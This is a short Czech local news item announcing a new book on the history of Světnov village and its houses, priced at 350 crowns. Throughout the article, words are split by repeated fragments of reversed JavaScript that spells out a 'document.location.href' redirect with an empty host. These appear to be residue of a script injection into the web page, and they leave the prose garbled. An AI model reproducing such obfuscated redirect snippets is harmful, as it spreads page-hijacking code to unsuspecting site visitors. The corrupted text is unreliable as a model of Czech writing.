Světnov, svetnov, aktuality, kniha, dějiny
Rainbow page separator

Nová kniha kompletně mapuje dějiny Světnova

Úterý, 27. listopadu 2012

Světnov / V nákladu sedmi s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek kusů vyšla výpravná publikace o Světnově, zakoupit je ji v současné době možné ve světnovském obecním úřadu za 350 korun. Knihu s názvem Dějiny Světnova a jeho domů tvoří his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie obce ležící v těsné blízkosti žďárského kláštera, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to od první písemné zmínky v roce 1366 až do roku 2010, a rovněž his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie všech tamních domů. Au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torem publikace je Petr Škarvada, fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografiemi ji doplnil Milan Šustr. Použité materiály pocházejí z archivů různých měst České republiky, světnovskou his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii dlouhou téměř sedm s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek let přibližují podrobné informace z grun[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovních a pozemkových knih, urbářů, starých kronik a podobných dobových dokumentů.

V knize Dějiny Světnova a jeho domů našel mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to každý dům v obci, jeho snímek – někdy současný i his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torický – i k němu se vztahující příběh. Součástí komplexně zpracovaného díla je také vložený DVD nosič, který obsahuje nejenom seznam veškerých použitých pramenů, ale také množství map a fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografických materiálů.